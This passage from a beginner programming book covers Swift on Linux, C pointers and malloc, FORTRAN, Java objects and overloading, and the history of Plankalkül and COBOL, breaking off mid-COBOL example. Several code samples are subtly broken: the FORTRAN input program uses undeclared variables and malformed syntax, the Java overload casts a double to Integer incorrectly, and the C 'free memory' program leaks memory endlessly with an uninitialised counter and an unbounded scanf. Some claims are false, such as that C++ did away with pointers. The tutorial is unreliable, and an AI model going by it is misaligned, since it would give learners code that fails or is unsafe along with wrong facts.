These extra chapters are intended to teach you something extra
beyond the core material that you may otherwise not come into
contact with. One of those things is Swift, Apple’s hot new
programming language intended to replace Objective-C. In fact,
Swift can now also be used on other platforms besides Apple’s
OS X and iOS. Since December 2015 Apple has made Swift 3.0
available for Linux. There are still limits. To create apps for
Apple products there will need to be a development framework
such as Xcode. Sadly Apple has not released that. At this moment
we can only wait for an open source port. However, you can
create applications such as games, text editors and webservers on
Linux. So let’s give swift a try on Ubuntu!
Installing Swift
The first step is to download the Swift Development Snapshot from
swift.org/download/, choose the latest Ubuntu version. Next unpack the file
you downloaded. Put the file in your workspace. This will then become the
location of your Swift installation. You may also optionally choose to shorten
the folder name. I have chosen
Swift_3.0
Next we need to install some dependencies for Swift in order to develop code.
sudo apt-get install clang libicu-dev
Clang is a compiler for C, C++ and Objective-C. A lot of low level Swift is
actually still Objective-C. Next we need to adjust the environment variables.
First check your current PATH settings with
$PATH
Now let’s change this path with the command
export PATH=/home/username/Swift_3.0/usr/bin:$PATH
Note the location of the directory where you placed you’re swift repo. Of
course you should also change username. If you use $PATH again you will
notice it has been changed. Now you are set to Swift! With
swift –version
we confirm everything is properly installed.
Swift version 3.0-dev (LLVM b361b0fc05, Clang 11493b0f62, Swift
24a0c3de75)
Target: x86_64-unknown-linux-gnu
Testing REPL
Swift comes with its own interactive shell like Python, it’s called REPL. By
just typing swift into Terminal you gain access to it. In REPL you can quickly
run some code when you need to. Let’s do a test. Type the following into
REPL.
1> var welcome = "Hello, world!"
REPL tells us the String value is assigned to welcome.
2> print(welcome)
With the print command we simply print out the string to the REPL interface.
Note how we assigned the value to a var. We could also have used let, but then
we could not change the value afterwards. Let is a constant, it is immutable.
That’s enough for REPL. Let’s write a proper test application.
Creating an application
For our Swift test application we will set up a proper folder.
mkdir HelloSwift
Inside this directory we create a file called Package.swift which every Swift
application must have.
touch Package.swift
Next we create a Sources folder
mkdir Sources
Every Swift application must have a file called main.swift inside Sources.
This will start the application.
touch Sources/main.swift
The only thing left to do is alter main.swift with your favorite text editor. Add
the following lines to read input from Terminal.
let response = readLine(stripNewline: true)
print(response)
Now we only need to compile the code with the command
swift build
Now we can run the program. Inside the HelloSwift folder run the following
command
.build/debug/HelloSwift
With the readLine function the program will stop until the user has pressed
Enter. If you input Hello, World! and press Enter you will see the string printed
to the console. readLine is from the Swift Standard Library and as such does
not require any specific import. The list of standard functions are those you
would expect such as swap, sizeof, min, max, assert and of course print.
Below is a more lengthy coding examples. If you can fully understand it than
you both know the basics of programming and of Swift. But first copy paste the
code, then compile and run the code to follow the tutorial.
import Foundation
print("Hello to this basic Swift script")
print("Would you like to proceed with a tutorial on Swift? Yes or No?")
let response = readLine(stripNewline: true)

var runTutorial: Bool
repeat {
if response == "Yes" || response == "yes" || response == "Y" ||
response == "y" {
print("Conditional statements are similar to Java")
print("You can use the || and && to chain conditions to together")
runTutorial = false
} else if response == "No" || response == "no" || response == "N" ||
response == "n" {
runTutorial = false
print("This tutorial will now end")
exit(0)
} else {
runTutorial = true
print("Incorrect input! Choose [Y]es or [N]o")
print(response)
}
} while runTutorial
print("For loops are simple. They follow the initialization; condition and
increment structure")
print(“Note: variables are incremented with double plus sign on the
left”)
for var i = 1; i <= 10; ++i {
print(“I love Swift”)
}
print("Classes are also similar to Java. You initialize a class object

calling the init function")
let s = Rectangle(base:5, height:6)
print("And you can use class functionality using the object.function() call
format.")
print("Example: the area of the rectangle is \(s.area()).")
As Swift focuses heavily on Object-Oriented programming there is also a

small class defines that calculates the area of a rectangle. Again, if you’re
familiar with Java, or Python all this will look familiar.
/*
* A simple Swift class for Linux!
*/
class Rectangle {
var base:Int
var height:Int
init(base:Int, height:Int) {
self.base = base
self.height = height
}
func area() -> Int {

return self.base * self.height
}
}
Essentially Rectangle is a user defined type, like Int and Bool. It has two
variables, an initializer used to first set it up and user defined functionality.
This one function, area(), calculates the area of the rectangle.
Swift in Linux is still under development, the Foundation package still needs a
lot of work, but it is getting there. Swift is an exciting new programming
language. If you want to develop a new skill that is bound to be relevant you
can do worse than picking Swift. Enjoy!
Source; http://itsfoss.com/use-swift-linux/
Chapter 3 C memory management and

pointer variables
Memory management
If you are a familiar with programming languages you will know that C is very
popular. It contests the top spot with Java and if you include its derivative
languages such as C++ and C# it is really no contest. C is efficient, of all the
programming languages it is relatively low-level, meaning you have to
program every tedious issue. Oddly enough, when C was introduced it was
criticized for being too high-level, especially in comparison to Assembly
language. Yet C is much easier to write and despite some critics it is very
efficient. To get the most out of you will have to use memory pointers and
references, the single greatest stumbling block for C novices. C++ has done
away pointers and references but as it is back-wards compatible with C many
programmers continue to use it. So let’s start with a brief overview. We begin
with a simple program that creates an integer variable, stores some value
inside it and prints this out. If you need to remember how to compile the code
see chapter 4, paragraph 4 Introduction to programming.
#include<stdio.h>
main() {
int randomValue;
randomValue = 12345;
printf("%d\n",randomValue);
}
In this example we refer to the variable randomValue by its name. Your

computer will access its RAM (Random Access Memory) and allocate a space
to store this variable. RAM is divided into bytes, which consists of eight
binary numbers (zero’s and ones). Afterwards a value is assigned to
randomValue and lastly we use printf to print the value to Terminal. In this
case %d denotes where the value needs to be printed, just before the line
carriage return - \n. A variable such as the integer randomValue may need
more than one byte to store its value. That depends on what type of variable it
is. In C, a simple integer value on a 64 bit system will take up 4 bytes[5]. You
can easily check this with the following program.
#include<stdio.h>
int main() {
int value = 12;
int sizeofvalue = sizeof(value);
printf("%d\n", value);
printf("%d\n", sizeofvalue);
}
Other variable have different values. The following program checks some of
the most popular primitive types found in C.
#include<stdio.h>
int main() {
int value = 12;
int sizeofvalue = sizeof(value);
printf("Size of int is: %d bytes\n", sizeofvalue);
double d = 2.1;
int sizeofd = sizeof(d);
printf("Size of double is: %d bytes\n", sizeofd);
float f = 55.7;
int sizeoff = sizeof(f);
printf("Size of float is: %d bytes\n", sizeoff);
char c = 'A';
int sizeofc = sizeof(c);
printf("Size of char is: %d bytes\n", sizeofc);
return 0;
}
This program reveals that doubles occupy 8 bytes in memory, floats 4 bytes
and chars just 1 bytes. Chars, or single characters, are encoded using the
ASCII system which consists of 128 characters in total. About 30 are now
obsolete. If you look at the ASCII table you will find for each character has a
binary notation, decimal and a hexa-decimal notation. Each of the C primitives
can be printed with printf, for int (which we have used so far) it is either %d
or %i. For chars it is %c, but if you were to print one out using %d you would
get its ASCII number!
Going back to memory addresses we now know the size of primitive types take
up in memory. Every time we create a variable and put a value in it we create
a box in memory. This box contains a value which can be accessed by using the
variable name. However, in C we can also refer to a variable by its memory
address instead of its name.
This feature becomes handy when we want to alter a variable inside a function,
just as we would do with Python. In fact, we cannot do it properly in C without
a memory address. If we used the variable name, the function merely copies
the value into new variable (with the same variable name) and alters that
variable! What we want from the function is it to change the variable value, not
just copy it. I will illustrate this subtle difference with a very common
programming example: the swap function.
The program below is larger than any other C program we have written, so
bear with me.
#include<stdio.h>
void swap(int, int);

void swapWithReference(int*, int*);
int main() {
int a = 2;
int b = 4;
swap(a, b);
printf("The value of a is %d and the value of b is %d\n", a, b);
swapWithReference(&a, &b);
printf("The value of a is %d and the value of b is %d\n", a, b);
}
void swap(int a, int b) {

int temp;
temp = b;
b = a;
a = temp;
}
void swapWithReference(int *a, int *b) {

int temp;
temp = *b;
*b = *a;
*a = temp;
}
The code above contains two versions of swap. Both functions are written
outside of the int main {} section. To make C understand they exist we write
stubbed version as the second and third lines.
Inside main we create 2 variables: int a and int b which we give values 2 and
4. We call both versions of swap, yet only one does what it is supposed to do
and that is swap both numbers around. The issue is that the function swap()
merely receives the values of a and b. Once inside, the function swaps the two
integer values but they are newly created variables that live only for the
duration of the function. They have was it is known as a local scope and are
destroyed as soon as the function ends. In effect, swap() does nothing.
The second function swapWithReference() instead receives the memory
address of variables a and b. This is done with placing the ampersand ‘&’
before the variable in the function call. Inside the function the variables are
first dereferenced. Whereas a and b would still refer to memory addresses *a
and *b do not. In essence the function swapWithReference() does the following
1. Create a integer variable temp
2. Place whatever is *b in temp
3. Place what is *a in *b
4. Place what is in temp in *a
It is important to denote that even though variables a and b are dereferenced
they still refer to a specific memory address. In essence if we talk about *a we
are saying ‘the value 2 that is at memory address XYZ’. And so with the
addition of two print statements we can find out if the values in the variables
have indeed been swapped.
The value of a is 2 and the value of b is 4
The value of a is 4 and the value of b is 2
If you want to you can actually print out the value of the memory addresses for
variables a and b. Just add the following line to the program.
printf("The memory address for a and b is %p %p\n", &a, &b);
The additional output is then

The memory address for a and b is 0x7ffca0ad56a0 0x7ffca0ad56a4
Although the actual memory address when you run this program will be
different.
This was the basics of C pointers. It can be tedious to learn if you’re a novice.
Using a print statement liberally can be a solution, but a better initial response
would be to just trace the code with a pencil and paper. What I have glanced
over is that you can have a dedicated pointer variable that will store the
reference to a specific memory block. Going all the way back to the
randomValue example we can create such a pointer variable by adding the
following line beneath the printf statement.
int * mem = &randomValue;
printf("%p\n",mem); // use %p to print out a pointer value
Now we have created a pointer variable named mem that stores the location of
randomValue, which is an integer variable. Using such pointer variables can in
practice speed up programs. Pointer variables have a special syntax, we have
already seen some of it with the function swapWithReference().
<pointer type> * <pointer name>;
In our example of mem the pointer type was an int, because the mem stored a
reference to an integer variable. So for each type of primitive variable (int,
char, float etc.) its corresponding pointer variable needs to be of the same type,
just with an asterisk behind it[6].
If we have a pointer variable and we want the value of the address it is
pointing to we can use the asterisk to get it. The asterisk is then used as the
‘value of’ operator, which I showed in swapWithReference().
char oneletter = 'j';
char * point_to_oneletter = &oneletter;
char readChar = *point_to_oneletter;
The example code above illustrates this. The first line creates a char variable
oneletter and assigns the letter j to it. The second line creates a pointer
variable point_to_oneletter of type char, and with the ampersand character we
assign the memory address of oneletter into the pointer. Finally, with the third
line we reverse this. We create a new char variable and with the asterisk
retrieve the value of the variable pointed to by point_to_oneletter. Thus the
‘value of’ operator * does the exact opposite of the ampersand &. Now the
circle is complete.
Malloc
Up to now we have create primitive variables and stored simple value.
However, with large applications it is often unclear how much memory we
will need and creating a new variable, be it a char or integer for each new
value would be overkill. With malloc, or memory allocation, function we can
assign as much memory to a variable as the system would allow. An example
that allocates a megabyte is as follows.
#include<stdio.h>
#include<stdlib.h>
int main() {
char * lots_of_memory;
lots_of_memory = (char *) malloc(1024*1024);
free(lots_of_memory);
There are three things to note. The first is that we needed to include an extra
header file for the stdlib library. Only then can we use malloc. The function
malloc has return type void *, so we always have to cast it specifically to the
variable type we want. In this case it is (char *). Last but not least we need to
free the memory if we do not use it.
Memory leaks and Valgrind
A clever little command line tool, developed by Julian Seward, called
Valgrind is able to uncover memory leaks in programs. If you don’t have
Valgrind installed, just use the following command
sudo apt-get install valgrind
We can test the program by replacing the following lines of code
lots_of_memory = (char *) malloc(1024*1024);
free(lots_of_memory);
with
lots_of_memory = (char *) malloc(1024);
lots_of_memory = 0;
The first line allocates a smaller portion of memory to the variable (just 1024)
bytes. The second line orphans the variable by overwriting the pointer with 0.
Thus there is NO pointer variable pointing to the 1024 of allocated bytes. If we
compile the program into one named memory we can show that. Using the
following Valgrind command we get a very lengthy stream of output that says
just that.
username@ubuntu:~$ valgrind --leak-check=yes –v ./memory
==87586== 1,024 bytes in 1 blocks are definitely lost in loss record 1 of
1
==87586== at 0x4C2BBCF: malloc (in
/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==87586== by 0x400547: main (in /home/username/memory)
With Valgrind we can thus easily debug C code that might contain memory
leaks. It earned Seward the 2006 Google-O'Reilly Open Source Award for his
work.
Conclusion
C memory allocation has many subtleties that can take a while to understand.
With most simple C programs you don’t need to bother with pointers. And so it
is up to you to learn to use them when you think it is suitable. Below is a C
program that determines how much free memory you have on your PC. It is a
good example of C. Play around with it. If you feel confident than check out
Kernighan and Ritchie’s (K&R) The C Programming Language recently
republished in EBook format.
#include<stdio.h>
#include<stdlib.h>
int main() {
char name[20];
int value;
printf("Enter your name: \n");

scanf("%s",name);
printf("Welcome: %s\n",name);
printf("Do you want to determine how much free memory you have?\n");
printf("Input 0 for no or 1 for yes\n");
scanf("%d", &value); // pass by reference
if (value == 1) {
char * memory;
int kilobytes;
int megabytes;
while(1) {
for (kilobytes = 0; kilobytes < 1024; kilobytes++) {
memory = (char *) malloc(1024);
}
megabytes++;
printf("Amount of memory allocated is: %d\n", megabytes);
}
} else if (value == 0) {
printf("In that case, Goodbye!\n");
}
return 0;
}
FORTRAN Programming Tutorial

This extra chapter is a small detour intended to raise your awareness on other,
older programming languages. FORTRAN in particular is still of interest.
FORTRAN was first released 1957 and was developed by John Backus. The
latest version, FORTRAN 2008 is still going strong and the small revision
version, FORTRAN 2015 is scheduled to be released in 2018. FORTRAN
remains particularly popular in the scientific field.
The first FORTRAN program we code is the ubiquitous Hello, World! As you
can see from the code below comments begin with the bang ‘!’ and each
program has an opening and closing line which mention the program name. In
this case the name is helloworld. Be careful as FORTRAN is case sensitive.
! Hello, world! in FORTRAN

program helloworld
print *, "Hello World!"
end program helloworld
To compile the program we can use gfortran, the GNU supplied open source
compiler. If it is not installed on your system use sudo apt-get install gfortran.
Other than that the syntax to compile is similar to gcc. This will compile the
source code into a program called helloworld.
gfortran helloworld.f08 –o helloworld

./ helloworld
A second and far more interesting program calculates the speed at which fluids
run. Try and get a basic feel for the syntax. It’s not all that different from other
languages isn’t it?
! This is a simple FORTRAN example program
program particle
implicit none
real :: rho_s = 2.7 ! particle density

real :: rho_l = 1.0 ! water density
real :: D = 0.01 ! particle diameter
real :: g = 981 ! acceleration due to gravity
real :: n = 0.01 ! viscosity
real :: v ! velocity (to be calculated)
v = ((rho_s - rho_l)*(D**2)*g) / (18*n)
print *, v
end program particle
The third and final program will display the important syntax necessary to
build a fully functional program. With the built-in read function we accept user
keyboard input, in this case an integer value. The asterisk * that follows is
called a unit identifier and is a necessity.
The conditional statement, if-else-then, is easy enough to understand and is

similar to most other programming languages. Note the endif keyword that
closes the conditional. This is mandatory, an ‘else + statement’ block is not.
The do-while loop will iterate until the user types in the terminal. This will set
the Boolean variable check to false. Notice the difference between a while-
loop and a do-while loop. The do-while is guaranteed to run through the code
inside the block at least once.
program userinput
implicit none
integer :: anything
check = .true.
print*,'Input an integer from the keyboard'

read*,anything
if (anything >= 10) then
print*, 'Value is 10 or greater'
else
print*, 'Value is less than 10. It is .',a
endif
do while(check)
print*, 'This is a simple FORTRAN program'
print*, 'Type in integer 1 to agree'
read*,anything
if(anything == 1) then
check = .false
endif
end do
end program userinput
Despite FORTRANs continuing popularity in science alternatives do exist. A

recent addition has been Julia. It combines efficient numerical and floating
point operations with extensive libraries for general-purpose programming and
web-use. I don’t think FORTRAN will go away any time soon, but the
alternatives will come to dominate the scientific field.
Chapter 4 Object-Oriented design with
Java
Object-Oriented Programming
Readers of this book who take an interest in the wider IT world may have
heard of Object-Oriented Programming - or OOP. Whereas the first chapter of
part 2 of this book dealt with the basics of programming, controls structures
and syntax this chapter deals with better organizing code. As you may guess
they are organized into Objects. After you finish part 2 on programming you
may decide to continue to hone your programming skills. Perhaps you are
looking for a new line of work. Learning about Java and OOP are an excellent
idea. Both are popular in the business world: the simple syntax and the ability
to organize code along the way business people think has made both popular.
Java
The Java language, which is at this moment the most popular in the world, was
designed by James Gosling in 1995 at Sun Microsystems. It is heavily
influenced by C, but Gosling wanted to make that language simpler to use. Java
makes extensive use of libraries, thus removing the need to type the nitty-gritty
details of many applications. Java also has automatic garbage collection.
Unused memory is automatically given back to main memory. Last but not least
Java can run on pretty much any computer, without the need to recompile the
code for that computer. So if I compile my Java code on Windows the
compiled code can also run on Linux, or an ARM based computer. The caveat
is that those other systems must also be able to use the Java Virtual Machine,
normally contained in a JRE (Java Runtime Environment). Code in Java is not
compiled from source to machine code; instead it is compiled into object code.
The JVM will at the start of a Java program transform this code to machine
code, in real-time, there is no waiting step to compile. This has advantages and
disadvantages. The advantage is that Object code can run anywhere, as
explained. The major disadvantage is that Java can be slower than other
language, especially C. However, with the introduction of the Java Just-In-
Time compiler (JIT) the major speed disadvantages have disappeared leaving
Java faster than many other languages except C.
Hello World! Again!
So let’s start with a simple HelloWorld example. With Gedit open a file named
HelloWorld.java and type in the following lines of code
public class HelloWorld {

// start of the program
public static void main(String[] args) {
System.out.println("Hello World!"); // print statement
}
}
In the first line we define a class. Java does everything with classes. It is a
simple way to divide code into organized places. The third line, beyond the
comment, is the official start of the program. Every Java program needs to
have an - static void main - statement otherwise the computer would not know
where to start the program. It is similar in nature to C. The final line of code
prints the now familiar phrase ‘Hello World!’ on a new line. System.out is a
built in java package used for printing to standard output – the command line.
The next step is to compile the program into object code. For that you will
need to install the java SDK. A standard version would be JAVA SE 8. To test
whether you have installed it properly type in javac –version into the command
line. Output should be something like javac 1.8.version_number. You can now
compile the code with the command
username@ubuntu:~$ javac HelloWorld.java
With ls you should see that there is now also a file called HelloWorld.class.
This is the object code file that can be exported to any system be it Windows,
Linux or MAC. To run the class file you need to have the Java Runtime
installed. Type in java –version to check. If the output finds a JRE you are all
set. Now you can run the object code. Type in
username@ubuntu:~$ java HelloWorld
And your output should be Hello World!
Objects
So what is an Object? To put it bluntly, it is a custom made variable. You
already know some programming languages have variables such as integers,
floats and strings, but you have not dealt with the possibility that things in this
world, around us, may not be easily defined by any of them. As an example,
take your own identity. If you write a program to store and manipulate
identities you have to deal with names, age, place of residence etc. Each can
be defined with a classic variable that I just mentioned, but only taken together
are they truly an identity. What if you could take all three variables and place
them in a variable called Identity? They would be where they belong with no
fear of causing spaghetti code as you try to maintain endless records of people
whom each may have dozens of variables. We now use Identity is an object. In
java, we deal with classes, each class is a blueprint for an object. If I want to
change the name of a person I change it using methods found in that class that
are suitable. This way what truly define an Identity are not just the variables
but also the functionality given to the Object by its methods. I know what I just
explained may be overwhelming so let me show you.
First off, we need a class that can start the program. The code you see below
will suffice, I called it StartApplication. It contains the line public static void
main, which some have called the GodMethod because it is where the entire
program sequence begins. After the start the first true line of the program is
line 3. See how it creates an instance of a new variable of type Hotel. The
instance is called hotel. This is similar to creating an instance of String with -
String string = “”;.That said, String is built-in as it is part of Java and already
defined, but our program below has no idea what a Hotel is.
public class StartApplication {
public static void main(String[] args) {
Hotel hotel = new Hotel("Fawlty Towers", "Basil and Sybil");
hotel.run();
}
}
Java will look for other class files in the same map for one called Hotel.java
public class Hotel {
String name = "";
String owner = "";
int numberOfRooms;
boolean isOpen;
public Hotel(String name, String owner) {

this.name = name;
this.owner = owner;
this.numberOfRooms = 26;
this.isOpen = true;
}
public void run() {

while (isOpen == true) {
}
}
}
The first piece of code creates a Hotel instance but on the right side it also
does something strange. The section new Hotel("Fawlty Towers", "Basil and
Sybil"); may seem alien at first, but what it essentially does is pass along two
strings in the creation of hotel. Now our unique variable Hotel already has two
interesting details, a name and an owner. Both strings were passed on to what
is known as the Constructor. The constructor is always named similarly to the
class but without the word class before it. The constructor is passed two
strings, name and owner. It is up to the programmer to understand what they
mean. We place both values into global variable that are similarly named, but
that is not necessary. The variable could have been called cat and mouse but it
wouldn’t make much sense. Yet the constructor does more. After it assigns the
two strings to the global variables it also sets the integer variable
numberOfRooms to 26 and the Boolean isOpen to true. The constructor in
essence creates in instance of the Hotel variable. Some arguments were passed
along, but two were hard-code. This should already indicate that Objects have
the potential for being far more versatile than ordinary variables.
Now that the hotel instance was created the program can move to the second
line. Remember I said you can assign functionality to an object. Well, in the
class file Hotel we have a method called run. Only hotel instances can run this
method and we have just created one. We call the method run on line 4 of the
previous code section. Afterwards the program ends. So if we want to give our
little example any kind of functionality it has to happen in method run. Below
is an extended section of the method plus an additional method that is called.
public void run() {

while (isOpen == true) {
Scanner user_input = new Scanner( System.in );
System.out.print("Should Basil close the hotel? Yes or No!");
String decisions;
decisions = user_input.next();
if (decisions.equals("Yes")) {
closeHotel();
System.out.print("The hotel will be closed");
}
}
}
public void closeHotel() {

this.isOpen = false;
}
You may already guess what it does. The while-loop in run will last until the
Boolean isOpen is set to false. We are going to try to do that by asking input
from the user. The first line in the loop creates a Scanner Object called
user_input. It is created by sending the argument System.in into its constructor.
Don’t worry about memorizing all this. I usually look at previous code
examples that I have written. You can do that as well. The next interesting line
is decisions = user_input.next(); this asks for user input and places that into
the String called decisions. Next we have a conditional statement that checks if
our input is equal to the String word Yes. If the user filled in anything else,
even nonsense it would never evaluate to true. If the user has inputted Yes the
conditional statement is entered and the method closeHotel is called. This
method should also be part of the class Hotel. All it does is switch the Boolean
value isOpen around. We could have called the method from the other class
where we have a Hotel instance called hotel. The method is public. If the
method is set to private instead than it can only be called from within the class
itself. So Objects have properties that are more than just variables, they also
have functionality.
Note that we have written two classes. You must compile both files, use the
java *.java to compile all java source files. However, only the object code for
StartApplication needs to be called to start the application as it contains the
GodMethod.
Overloading
Now that you understand that all Java classes (blue-prints for Objects) the
sticky issue arises of what to do if a method already exists, but you do not have
exactly the right input to use it. For example if you asked a user for their age
but instead of storing the value in an Int you have used String.
With method overloading you can write different versions of the same method
suitable for different types of input. The example below illustrates how I want
to perform calculations on my bank account, but instead of Double values I
also want to use non-decimal Integer values. To overwrite my current balance I
can write two methods.
public void newBalance (int balance) {

this.balance = balance;
}
public void newBalance (double balance) {
balance = (Integer) balance; // cast the double to int
this.balance = balance;
}
The advantage is that if another part of the program which I do not have control
over (not unusual in large programming applications) either gives me a double
or an integer I do not have to change my code. I have to call function
newBalance just once and either version will be called depending on what the
input value is. This takes complexity out of my hands. In fact, it is well
possible to also overload Constructors. If I either have a double or an integer
value and I want to open a new bank account I can write two constructors.
Polymorphism
A related issue to overloading and overwriting is polymorphism. What this
means is that certain parts of code will accept different types of Objects as
long as they are related. Whether or not a program will get a particular Object
has not been decided at the moment it was written but is instead decided at
run-time? As an example, a person can be a male or female (leaving out third-
gender for clarity). If you’re using the program and it asks for your gender, it
can create a gender object that is either male or female. Instead of using
control statements to decide what to do in either case you can just pass the
object to where you want it to go. For both to be similar they need to be
subtypes of a class that need to be accepted by the program. You can imagine
that organizations and businesses prefer Object design as it allows them to
clearly demarcate functionality. At times it does become more complex.
Conclusion
Arguably this chapter is more abstract than the others. Object-Oriented design
can take a while to fully understand properly. Yet the most important lesson to
learn if that you as the programmer can create any kind of variable you want.
That variable can be built out of either primitive Java variables such as String
and Int but also out of other user defined variables. Each variable can
additionally contain any user defined functionality by defining methods in the
variable class file. After this arguably difficult chapter I have a special lengthy
detour passed several Computer Science topics in the next – extra – chapter.
A brief history of programming
languages
The oldest programming language
Generally speaking COBOL, Lisp, and FORTRAN are considered the oldest
programming languages still in widespread use. Each has significantly been
altered since their inception during the late 50s. Remember, COBOL came
about because FORTRAN was considered to be lacking in portability features.
Nonetheless, older programming languages do exist. The exact criteria that
define what programming languages are is open to debate, but it should at least
provide a layer of abstraction for the computer and the machine languages that
run on it. The late 50’s saw a lot of new languages; some would transform into
COBOL (COMTRAN) or were a forerunner (FLOW-MATIC). Another major
programming language was Lisp, created in 1958 by John McCarthy, which
found its niche with research into Artificial Intelligence.
Figure 43. Konrad Zuse
However, the very first acknowledged high-level programming language is
Plankalkül, designed by the legendary computer scientist Konrad Zuse between
1945 and 1948. Zuse had worked in Germany during the Second World War on
a computer series (Z2 to Z4) that was in many ways more advanced than those
designed by Alan Turing. After the bombing campaign of the RAF destroyed
all of his equipment in several large air raids Zuse had to stop his work. He
took the opportunity of the post-war period to write his thesis on the concept of
high-level programming languages. Plankalkül has widely been cited as being
of influence during the 50’s for languages such as ALGOL and subsequent
decades but it remained a theoretical programming language relying heavily on
mathematical concepts such as Relational Algebra.
So how does PlanKalkul work?
Just like with modern programming languages the program is broken up into
smaller components. Each perform a calculation. Such blocks are called plans
and when chained together form a program. Each plan has input variables. V
variables form the input and are read-only. Z variables are used as
intermediary storage. R variables are used to declare the result variables.
Every plan is preceded with what was referred to as a ‘Randauszug’ which
defined the number of input and output variables as well as their type. If for
example Plan 1 has output variable R0 (we start at 0 of course) and we want to
use this as input for Plan 2 than the Randauszug for Plan 2 would as follows:
R01(V0) => R0
We have now defined both the input and output variables for Plan 2 and show
the origin of the input variables with the 1 behind R0. Plan 1 and Plan 2 are
thus also chained together.
Zuse also used a very strange programming notation for PlanKalkul. It is in a

two-dimensional notation as seen below. The columns denote each variable.
The row V describes the variable name, so there Z4 and Z2. The last row, S,
denotes the type of the variable. In this case it is a single bit, called a ‘Ja-
Nein-Werte’. The row marked K contains the value. In this case Z0 refers to
component 3 of component 2 or variable Z0.
Z Z
V 4 2
K 2.3
S 0 0
The data structures in Plankalkul are very elementary. It contains only one
primitive value, the single bit, denoted as S0. All other variables are derived
from the single bit. An array of bits is represented as n x 0. An array of arrays
would thus be m x n 0. We can also create tuple, or list of single bits. With
(0,0) we create a tuple of two bits and with (0,0,0) the tuple would be 3 bits in
size.
With this notation you can also create arrays and tuples on existing datatypes.
The following variable declaration shows this. Z0 is a single bit with currently
no value assigned. V0 is tuple of datatype 12, which Zuse described as
fraction. Z1 is an array of four bits.
Z V Z
V 0 1 1
K i
S 0 (12,12) 4x0
Plankalkul also had operators. They are simple. The left value is assigned to
the right variable, the opposite of what is normal today. For example 10 => Z0
assigns the value 10 to Z0.
The language also has conditional statements. The following statement
resembles the if-else block.
Z0 -.> Statement 1
Z0 -.> Statement 1
Plankalkul also had a simple looping structure. This is denoted with W for
Wiederhohlung. The loop continues until for each statement the precondition is
false, or until the special symbol ‘Fin’ is encountered.
Just like with all the other programming languages detailed in this book I also
include the Hello, World! example.
R1.1(V0[:sig]) => R0
R1.2(V0[:m x sig]) => R0
0 => i | m + 1 => j
[W [ i < j -> [ R1.1(V0[i: m x sig]) => R0 | i + 1 => i ]
]]
END
R1.3() => R0
'H';'e';'l';'l';'o';',';' ';'w';'o';'r';'l';'d';'!' => Z0[: m x sig]
R1.2(Z0) => R0
END
COBOL
COBOL is probably one of the oldest programming languages still in popular
use. The first version was released in 1959. It was designed by a committee
whose objective was to make COBOL portable, easy to understand and easy to
use in the business world. Because of the lack of any academics within its
development committee the language developed several idiosyncrasies which I
discuss below.
COBOL has often been criticized for being archaic and verbose. The latter may
be true but most of the criticism is unfounded and seems to be no more than a
continuation of decades old opinions. Up until the late 90’s COBOL code was
the most widely deployed language in the world. Even as of 2016 there is over
200 Billion lines of code that is known to be deployed, with the rate increasing
annually between 3 and 4 percent. COBOL is a unique language, it lacks some
features such recursion because its original design committee did not think it
worthwhile. That, along with several other idiosyncrasies, have made the
language unpopular in the academic world where C, C#, Python and Java
dominate. Yet COBOL is very good at what it does, support back-end business
processes.
It is said that despite COBOL’s lessening popularity that those with expert
knowledge of the language on average earn 10 thousand dollars per year more.
Even if they don’t do any COBOL programming! I have included COBOL in
this chapter for a variety of reasons. The first is obvious. A lot of COBOL has
been written over the years. It needs to be maintained, translated or ported and
so chances are you will come in contact with COBOL. The second reason
stems from the first. If besides C, Python or Java you have COBOL on your
resume you will stand out among the crowd. In this chapter I will show several
small examples of COBOL code.
Getting COBOL to compile is a lot easier now than it used, most compilers
were proprietary. As it happens GNU has a COBOL compiler with runtime
libraries for Linux. It used to be called OpenCOBOL, now its GnuCOBOL. To
install the COBOL compiler just type in the following commands.
sudo apt-get install open-cobol
We will get started wiring COBOL straight away. Our first program is of
course the ‘Hello, World!’ example popularized by the book, The C
Programming Language. Just type in or copy the following lines and put them
in a file called HELLO.COB
*> GnuCOBOL Hello World example
identification division.
program-id. hello.
procedure division.
display "Hello, world!"
end-display
goback.
This code is compiled as follows.
$ cobc -x -free hello.cob

$ ./hello
Hello, world!
The first line is a comment which starts with ‘*>’ and everything afterwards is
ignored by the compiler. Alternatively a comment can just start with an asterisk
*. The second line ‘identification division.’ Identifies the program. The line
‘program-id. hello.’ Will assign a name to the program. In this case hello
Finally we end up with the lines of code that actually perform processing. The
line ‘display "Hello, world!"’ prints the phrase Hello, world! to the Terminal.
With ‘end-display’ we signal there will be no more output which is followed
by the program terminator ‘goback’. Only the last three lines were actually
statements that we know from languages such as Python and C. The first four
lines were part of the program structure.
Luckily the COBOL syntax is easy to understand. Its high-level abstraction can
at times almost read like English. However, it used to be worse. During the
day that punch cards were used to store and edit programs. During this time
each program had a line number consisting of six digits.
COBOL was initially intended to be read pretty much like any English text.
That didn’t happen, but it is structured like a text. A COBOL program is
divided into divisions, paragraphs and sentences. Some of these elements were
already show in the sample program, but below these concepts are detailed
further.
Divisions
Every COBOL should consist of four divisions, but only two are strictly
necessary. The first division is the IDENTIFICATION DIVISION which
provides the unique program identification. The program name is comes after
the keyword PROGRAM-ID and can have a maximum of 8 characters in size.
Note the end of line dot ‘.’ After the keyword and the program name in the
example below.
IDENTIFICATION DIVISION.
PROGRAM-ID. TESTPROG.
The second division is the ENVIRONMENT DIVISION, it describes the

computer and other devices used to compile and execute the program. It may in
fact be one of COBOL’s key strength in that such a division exists. It is also
entirely optional. It is further divided into CONFIGURATION SECTION and
INPUT-OUTPUT SECTION, both are again optional.
The third division, DATA DIVISION is
The fourth division, PROCEDURE DIVISION is necessary. It contains the

program’s executable statements ordered into sections and paragraphs. The
code can then be executed using the PERFORM and GO TO keywords. Below
is an example of a procedure division that is organized into two blocks.
PROCEDURE DIVISION.
Begin.
PERFORM DisplayHelloWorld 10 TIMES.
STOP RUN.
DisplayHelloWorld.
DISPLAY “Hello World!”.
This example introduced several new keywords. These are verbs and are
followed by the operands on which the verb acts. COBOL verbs can be
categorized according to their type. At the moment there are 47 such verbs.
I finish this section on COBOL with a simple program. It prompts the user to
enter two single-digit numbers. The numbers are added together and the result
is displayed on the computer screen.
IDENTIFICATION DIVISION.
PROGRAM-ID. AddUp.
AUTHOR. JJ Kane.
DATA DIVISION.
WORKING-STORAGE SECTION.
01 FirstNum PIC 9 VALUE ZEROS.
01 SecondNum PIC 9 VALUE ZEROS.
01 CalcResult PIC 99 VALUE 0.
01 UserPrompt PIC X(38) VALUE “Please enter two single digit
numbers”.
PROCEDURE DIVISION.
